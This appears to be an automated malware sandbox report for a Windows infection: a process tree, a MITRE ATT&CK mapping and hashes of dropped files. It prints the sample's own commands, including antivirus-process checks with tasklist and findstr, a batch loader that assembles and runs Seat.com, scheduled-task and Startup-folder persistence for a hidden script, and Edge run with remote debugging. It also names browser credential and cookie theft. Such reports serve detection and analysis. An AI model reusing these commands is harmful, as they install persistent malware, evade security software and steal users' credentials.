C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2032 /prefetch:28⤵PID:3520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:38⤵PID:6104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3000 /prefetch:88⤵PID:4356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:18⤵
- Uses browser remote debugging
PID:6312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:18⤵
- Uses browser remote debugging
PID:5452
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2616 /prefetch:28⤵PID:2828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2624 /prefetch:28⤵PID:5904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2624 /prefetch:28⤵PID:6384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2396 /prefetch:28⤵PID:228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4064 /prefetch:28⤵PID:4160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4140 /prefetch:28⤵PID:5576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4340 /prefetch:28⤵PID:6824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,7804349775216050691,5804687668313784722,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3736 /prefetch:28⤵PID:6640
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 9486⤵
- Program crash
PID:6516
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126740101\HmngBpR.exe"C:\Users\Admin\AppData\Local\Temp\10126740101\HmngBpR.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6604 -
C:\Users\Admin\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeC:\Users\Admin\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:7036 -
C:\Users\Admin\AppData\Roaming\Dockerprotectysd\SplashWin.exeC:\Users\Admin\AppData\Roaming\Dockerprotectysd\SplashWin.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:384 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe8⤵
- System Location Discovery: System Language Discovery
PID:5376 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe9⤵PID:6076
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126750101\FvbuInU.exe"C:\Users\Admin\AppData\Local\Temp\10126750101\FvbuInU.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5984
-
-
C:\Users\Admin\AppData\Local\Temp\10126760101\ADFoyxP.exe"C:\Users\Admin\AppData\Local\Temp\10126760101\ADFoyxP.exe"5⤵PID:6052
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat6⤵PID:6660
-
C:\Windows\SysWOW64\expand.exeexpand Go.pub Go.pub.bat7⤵PID:6488
-
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
PID:7084
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"7⤵PID:5020
-
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
PID:2204
-
-
C:\Windows\SysWOW64\findstr.exefindstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"7⤵PID:2264
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 3530907⤵PID:4504
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Really.pub7⤵PID:3688
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "posted" Good7⤵PID:5812
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com7⤵PID:5828
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m7⤵PID:6392
-
-
C:\Users\Admin\AppData\Local\Temp\353090\Seat.comSeat.com m7⤵PID:6564
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 57⤵PID:6536
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10126770101\pwHxMTy.exe"C:\Users\Admin\AppData\Local\Temp\10126770101\pwHxMTy.exe"5⤵PID:6604
-
C:\Users\Admin\AppData\Local\Temp\10126770101\pwHxMTy.exe"C:\Users\Admin\AppData\Local\Temp\10126770101\pwHxMTy.exe"6⤵PID:6076
-
-
C:\Users\Admin\AppData\Local\Temp\10126770101\pwHxMTy.exe"C:\Users\Admin\AppData\Local\Temp\10126770101\pwHxMTy.exe"6⤵PID:6084
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 9286⤵
- Program crash
PID:6080
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10126780141\ogfNbjS.ps1"5⤵
- Command and Scripting Interpreter: PowerShell
PID:5292
-
-
C:\Users\Admin\AppData\Local\Temp\10126790101\CgmaT61.exe"C:\Users\Admin\AppData\Local\Temp\10126790101\CgmaT61.exe"5⤵PID:7116
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2R0700.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2R0700.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Users\Admin\AppData\Local\Temp\HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe"C:\Users\Admin\AppData\Local\Temp\HQPQG5HGTDZZH7M7ZTK3B7EWNO1U6P9.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2460
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3E11p.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3E11p.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:776
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 856 -ip 8561⤵PID:2812
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2508
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6140
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 3440 -ip 34401⤵PID:3132
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:6764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:2072
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:1240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6604 -ip 66041⤵PID:6100
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F1⤵PID:4928
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F2⤵
- Scheduled Task/Job: Scheduled Task
PID:1296
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit1⤵PID:5928
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Authentication Process
1Modify Registry
6Obfuscated Files or Information
1Command Obfuscation
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
5Credentials In Files
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.9MB
MD537e4db9e1d41f6b2946439c86b90f179
SHA189c73870f4cf47c1081b9feb6931d1a125a0bf44
SHA256e1892e2e2ae4c06f9d9608162cddf7e288ba3fa83ba944293f8b2783f17ef0d6
SHA5129b14d226009ac99d3dbb98609a68b447a742e0645d8fdb8836877cfa1594409bb77f75b8725fd79c29e26629670ac3e4fe5eeab6f8565fdfb7ce181eb2ae163d
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
114KB
MD5b28c7f7cff15a860603a1d6523afb720
SHA1281af1b07b39c5b75f451d2d86bfd07b42054c39
SHA2563df169b8995f5d21eefd5f2c1edb3a15f51dcaae38c2d16d1050b3c884c71f14
SHA512f80e505c77286abb99aa03a3f25510cf0eb092892adb2fb02add9011c85362c8d215cd1225bc73a582f4b149bdedcbb1379ae1d48d320cc535cf20710be89af3
-
Filesize
40B
MD505347574d072059398ca8469139546b5
SHA1b0ea682e2cf912e316e457364b5ae91ae428ed6d
SHA256373210dcebacba9ff6058df3564f518f77243a7ce14117114dc62ff6da65b8e0
SHA51251e8d6441b4ff135fc0ac43b236dc80d3cf6bc536408138525073e570a2f4c2f10958e7b34cc100032aafc9209e526632c738295f6718f9f3358005aa197caf7
-
Filesize
649B
MD5355a483429d1666adff6c0b41f016d50
SHA1bed2c854889947efa74ed193c2face1db7f3cf07
SHA256df75ce4d3b256b3b3ffb75edae8f7560a50dc495a863d04736a69a24d772140d
SHA512e2a5c0b71d03792e353585334b7dc0c53467c6ecf522c4f6849c2b4d66649e8c1d5c2e09b9bfa83b297a9d4abe20182f776301f7821c4a9e8515150b6edae6df
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json
Filesize851B
MD507ffbe5f24ca348723ff8c6c488abfb8
SHA16dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA2566895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA5127ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json
Filesize854B
MD54ec1df2da46182103d2ffc3b92d20ca5
SHA1fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA2566c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5def65711d78669d7f8e69313be4acf2e
SHA16522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA51205b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7
-
Filesize
150B
MD526b73fff8dea7c25bafe9229c9223239
SHA1199bb083379c98f59448645320dd644967b1d17c
SHA256cd852dc4f9433ecf44dd68f14bc8f96b506c6767df2e4213bce828cc9a8a6095
SHA5127b0193963a70c3e2286a59fe6095438968e80e0d05c79bc43ed254f375940a261618f64acd8d34452e043f8f9b0e2d3c8edaecd70889284405146c4dfb7b0ca1
-
Filesize
284B
MD5560addcb793a1611687305eb8ef4cac8
SHA1fc2a277b1451dc8724b97271900294183ad72f96
SHA256a49df309bcf554702070a46df9b969f8321b1058b2368771097fddba3bf586f4
SHA512c03a475cee80b3ab1736f553470a67c3d61ed0fced9543fc4b30b3ad3ba8d6bc8cd92d0652d4ab2ca66d74693d7c471c529618532eb3b8ab535f3c58950427b1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\02b6c164-5ad3-494b-a06b-7d7c9cffcea8.dmp
Filesize10.4MB
MD5edb26181f81823ad4b3f2aa8c8782b03
SHA193cab9a4d9ccd4dfe469da24c03f7e4575cb9fd5
SHA256b6139d755d2f05c202fc71b677d523dd3e6b69420903b33af02a379ee324cc11
SHA512c29c1435e9343e6098a53b561dbec85f5ac93e0bac297cb575b18aa1487abcabe109c789dbc3487b47f803e7b0367c00c9f330fbdd1bcf3d3b15f0e2cbe6ea1c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\b7b0cd31-08ab-4f74-8df9-ca9c589ac337.dmp
Filesize10.5MB
MD500ed1cd5960ac182fc0a72b78b147f60
SHA16a3739540f3888e8e7f0e9cb9a61836e56095657
SHA25606ee8d909bc8d7a8a161323712c0fd3fbd393bd55b97a0022fb55149730f96cd
SHA512262694046f4e25b4c31486ef808af68db307be3d71962d1a90fabaadb20f8f10cc303a86f4f2f4961d679c1e1de29099e11b0db3c14ea150b8d73c3d0e2d9cd3
-
Filesize
152B
MD594bd9c36e88be77b106069e32ac8d934
SHA132bd157b84cde4eaf93360112d707056fc5b0b86
SHA2568f49a43a08e2984636b172a777d5b3880e6e82ad25b427fef3f05b7b4f5c5b27
SHA5127d4933fae6a279cc330fde4ae9425f66478c166684a30cec9c5c3f295289cf83cbdf604b8958f6db64b0a4b1566db102fbcbdcdb6eca008d86d9a9c8b252ff16
-
Filesize
152B
MD525f87986bcd72dd045d9b8618fb48592
SHA1c2d9b4ec955b8840027ff6fd6c1f636578fef7b5
SHA256d8b542281740c12609279f2549f85d3c94e6e49a3a2a4b9698c93cca2dce486c
SHA5120c8a0d1a3b0d4b30773b8519a3d6e63d92973733da818ca9838599a9639e18df18ce31ebf56f46f6bbb7d89d10c726f4d73781e154d115a6068a3be7dd12b314
-
Filesize
152B
MD53f924426dc6a4ac978a90931d0dd07b6
SHA19fc53870215681057bc3d8a2354eb4a426613f46
SHA256a26eb568c2342d8bdfbcdd2d017ef86f94e18475ea4d5cb7948cce79f593f6e2
SHA512e9873cdee570cb9b3d7df96b422f1a34925484ead0ae0522bd4dfebbf420c7036b650145462e1dac7f744daeed889f53ed0ee250a8d3030d81e9f26d3269fbd1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\9dd2ac74-2cd0-4e0e-9851-e443b77514b9.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
5KB
MD52c063cda8d613729077251b2acbb764f
SHA13bf59fa4161ae44db5a94fa6d1c388e73edc30f1
SHA256850cda377967804c2841159f8502172eca4cb8ffd51289c47b279b3098a77114
SHA512e782f0d7fe4466e571b42997576367554eb254e3e4be159fa8cb4f5245594b967d3d4161714fa43d995753626e3aef85705dea563affd6e63e3cd0404e11e6dc
-
Filesize
5KB
MD597fcc216323be5967b5696823340ed00
SHA1133b41251e2a59b023b1ea1be76ea154a02601b1
SHA256c74528400690ebc255a317eb401856025e05bf7afa9c17704b919ab64090793d
SHA512fa6b1a9968bb24a229642f58eceb77c3b26a5030d5dd3752ce96183739cedbe81564cddbbba286e92463305405fdb0e7fa465bcb52177bcb632b7754e503e681
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
987KB
MD5f49d1aaae28b92052e997480c504aa3b
SHA1a422f6403847405cee6068f3394bb151d8591fb5
SHA25681e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA51241f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773
-
Filesize
15KB
MD5793365939b3b93a4ab7d53f872fa762f
SHA111c1d6ff077b2bb8e8fbd1ac2d420777de38147e
SHA2568217ce04af50bde0f527db958d7980ba96fa1fd152ec1a566bd9971a37bde085
SHA51264ca26c86f6d08f9cd1ae867c302e1b5fa25c3c5c45a01c533c7837a5ae986c074b5d4cedf8577bd6f6fff2a0fec42937b8e8479056558cbc526235df0bf230a
-
Filesize
18KB
MD574c13909e18febb6cf62799cd7aa355c
SHA19de9b21c9c680a74e8b5e2433f32246c567f6281
SHA256e1d5994700e965a60c3108c9add411878bf04a1e9fcc1a7defe0b24432ac9a3f
